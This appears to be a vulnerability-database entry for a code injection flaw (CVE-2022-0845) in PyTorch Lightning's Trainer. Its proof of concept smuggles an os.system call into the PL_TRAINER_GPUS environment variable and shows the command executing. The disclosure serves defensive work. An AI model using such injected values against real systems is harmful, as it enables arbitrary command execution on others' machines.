Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrWhokilleddbA795BF93-C91E-4C79-AAE8-F7D8BDA92E2A
HistoryMar 02, 2022 - 8:56 p.m.

Code Injection

2022-03-0220:56:36
whokilleddb
www.huntr.dev
9

0.003 Low

EPSS

Percentile

71.6%

JSON

Description

The attacker can execute commands on the target OS running the operating system by setting the PL_TRAINER_GPUS when using the Trainer module.

Proof of Concept

$ pip3 install pytorch-lightning

import os
from pytorch_lightning import Trainer
from pytorch_lightning.utilities.argparse import *


parse_env_variables(Trainer)

$ ls

os.environ["PL_TRAINER_GPUS"] = 'os.system("touch rickroll")'

parse_env_variables(Trainer)

$ ls
rickroll

Collab Notebook: https://colab.research.google.com/drive/1lMPSsKN7cNWcHkh7ZBvsNkCZRcoTPJq8?usp=sharing

Impact

This vulnerability is capable of executing remote code on the target system in the context of the user running the program.

Related

osv 3
cvelist 1
github 1
nvd 1
prion 1
cve 1
veracode 1
huntr 1
osv
osv
PYSEC-2022-181
2022-03-05 22:15:00
Code Injection in PyTorch Lightning
2022-03-06 00:00:16
CVE-2022-0845
2022-03-05 22:15:07
cvelist
cvelist
CVE-2022-0845 Code Injection in pytorchlightning/pytorch-lightning
2022-03-05 21:25:09
github
github
Code Injection in PyTorch Lightning
2022-03-06 00:00:16
nvd
nvd
CVE-2022-0845
2022-03-05 22:15:07
prion
prion
Code injection
2022-03-05 22:15:00
cve
cve
CVE-2022-0845
2022-03-05 22:15:07
veracode
veracode
Remote Code Execution (RCE)
2022-03-07 05:05:37
huntr
huntr
Contextual Code Execution
2022-06-04 11:47:46

0.003 Low

EPSS

Percentile

71.6%

JSON
Related for A795BF93-C91E-4C79-AAE8-F7D8BDA92E2A
osv3cvelist1github1nvd1prion1cve1veracode1huntr1